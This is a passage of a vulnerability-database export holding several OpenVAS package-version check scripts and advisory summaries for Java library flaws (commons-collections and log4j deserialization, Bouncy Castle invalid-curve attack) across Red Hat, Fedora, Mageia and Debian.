See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871512\");\n script_version(\"$Revision: 12380 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:03:48 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-01 06:13:38 +0100 (Tue, 01 Dec 2015)\");\n script_cve_id(\"CVE-2015-7501\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for jakarta-commons-collections RHSA-2015:2521-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jakarta-commons-collections'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Jakarta/Apache Commons Collections\nlibrary provides new interfaces, implementations, and utilities to extend the\nfeatures of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. 
Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at the references.\n\nAll users of jakarta-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\");\n script_tag(name:\"affected\", value:\"jakarta-commons-collections on Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:2521-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-November/msg00070.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n script_xref(name:\"URL\", value:\"https://access.redhat.com/solutions/2045023\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"jakarta-commons-collections\", rpm:\"jakarta-commons-collections~3.2.1~3.5.el6_7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:18", "description": "The remote host is missing an update for the ", 
"cvss3": {}, "published": "2017-06-13T00:00:00", "type": "openvas", "title": "Fedora Update for log4j12 FEDORA-2017-8348115acd", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872759", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872759", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for log4j12 FEDORA-2017-8348115acd\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872759\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-06-13 13:16:33 +0200 (Tue, 13 Jun 2017)\");\n script_cve_id(\"CVE-2017-5645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for log4j12 FEDORA-2017-8348115acd\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'log4j12'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"log4j12 on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-8348115acd\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RS6LAXEJOL4LHVMUZYRNYICQN24X7PG6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"log4j12\", rpm:\"log4j12~1.2.17~19.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-08T00:00:00", "type": "openvas", "title": "RedHat Update for log4j RHSA-2017:2423-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871877", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871877", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_2423-01_log4j.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for log4j RHSA-2017:2423-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871877\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-08 07:19:05 +0200 (Tue, 08 Aug 2017)\");\n script_cve_id(\"CVE-2017-5645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for log4j RHSA-2017:2423-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'log4j'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Log4j is a tool to help the programmer\noutput log statements to a variety of output targets.\n\nSecurity Fix(es):\n\n * It was found that when using remote logging with log4j socket server the\nlog4j server would deserialize any log event received via TCP or UDP. An\nattacker could use this flaw to send a specially crafted log event that,\nduring deserialization, would execute arbitrary code in the context of the\nlogger application. (CVE-2017-5645)\");\n script_tag(name:\"affected\", value:\"log4j on Red Hat Enterprise Linux Server (v. 
7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:2423-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-August/msg00038.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"log4j\", rpm:\"log4j~1.2.17~16.el7_4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:12", "description": "Mageia Linux Local Security Checks mgasa-2015-0487", "cvss3": {}, "published": "2015-12-29T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0487", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310131170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131170", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0487.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General 
Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131170\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-12-29 11:15:52 +0200 (Tue, 29 Dec 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0487\");\n script_tag(name:\"insight\", value:\"The Bouncy Castle Java library before 1.51 does not validate a point is within the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an invalid curve attack (CVE-2015-7940).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0487.html\");\n script_cve_id(\"CVE-2015-7940\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n 
script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0487\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"bouncycastle\", rpm:\"bouncycastle~1.50~3.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:36:09", "description": "Tibor Jager, Jorg Schwenk, and\nJuraj Somorovsky, from Horst Gortz Institute for IT Security, published a\npaper in ESORICS 2015 where they describe an invalid curve attack in Bouncy\nCastle Crypto, a Java library for cryptography. An attacker is able to recover\nprivate Elliptic Curve keys from different applications, for example, TLS servers.", "cvss3": {}, "published": "2015-12-14T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3417-1 (bouncycastle - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703417", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3417.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3417-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public 
License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703417\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-7940\");\n script_name(\"Debian Security Advisory DSA 3417-1 (bouncycastle - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-14 00:00:00 +0100 (Mon, 14 Dec 2015)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3417.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(7|8)\");\n script_tag(name:\"affected\", value:\"bouncycastle on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 1.44+dfsg-3.1+deb7u1.\n\nFor the stable distribution (jessie), this problem has been fixed 
in\nversion 1.49+dfsg-3+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.51-2.\n\nWe recommend that you upgrade your bouncycastle packages.\");\n script_tag(name:\"summary\", value:\"Tibor Jager, Jorg Schwenk, and\nJuraj Somorovsky, from Horst Gortz Institute for IT Security, published a\npaper in ESORICS 2015 where they describe an invalid curve attack in Bouncy\nCastle Crypto, a Java library for cryptography. An attacker is able to recover\nprivate Elliptic Curve keys from different applications, for example, TLS servers.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libbcmail-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcmail-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcmail-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbctsp-java\", 
ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbctsp-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbctsp-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcmail-java\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcmail-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpg-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpkix-java\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcpkix-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbcprov-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-24T12:53:16", "description": "Tibor Jager, Jorg Schwenk, and\nJuraj Somorovsky, from Horst Gortz Institute for IT Security, published a\npaper in ESORICS 2015 where they describe an invalid curve attack in Bouncy\nCastle Crypto, a Java library for cryptography. 
An attacker is able to recover\nprivate Elliptic Curve keys from different applications, for example, TLS servers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html\nPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf", "cvss3": {}, "published": "2015-12-14T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3417-1 (bouncycastle - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703417", "href": "http://plugins.openvas.org/nasl.php?oid=703417", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3417.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3417-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703417);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-7940\");\n script_name(\"Debian Security Advisory DSA 3417-1 (bouncycastle - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-12-14 00:00:00 +0100 (Mon, 14 Dec 2015)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3417.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"bouncycastle on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 1.44+dfsg-3.1+deb7u1.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.49+dfsg-3+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.51-2.\n\nWe recommend that you upgrade your bouncycastle packages.\");\n script_tag(name: \"summary\", value: \"Tibor Jager, Jorg Schwenk, and\nJuraj Somorovsky, from Horst Gortz Institute for IT Security, published a\npaper in ESORICS 2015 where they describe 
an invalid curve attack in Bouncy\nCastle Crypto, a Java library for cryptography. An attacker is able to recover\nprivate Elliptic Curve keys from different applications, for example, TLS servers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html\nPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libbcmail-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcmail-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcmail-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbctsp-java\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report 
+= res;\n}\nif ((res = isdpkgvuln(pkg:\"libbctsp-java-doc\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbctsp-java-gcj\", ver:\"1.44+dfsg-3.1+deb7u1\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcmail-java\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcmail-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpg-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpkix-java\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcpkix-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbcprov-java-doc\", ver:\"1.49+dfsg-3+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:33:49", "description": "This host is installed with Oracle BI Publisher\n and is prone to a code execution vulnerability.", "cvss3": {}, "published": "2018-10-18T00:00:00", "type": "openvas", "title": "Oracle BI Publisher Code Execution Vulnerability (oct2018-4428296)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2019-05-17T00:00:00", "id": 
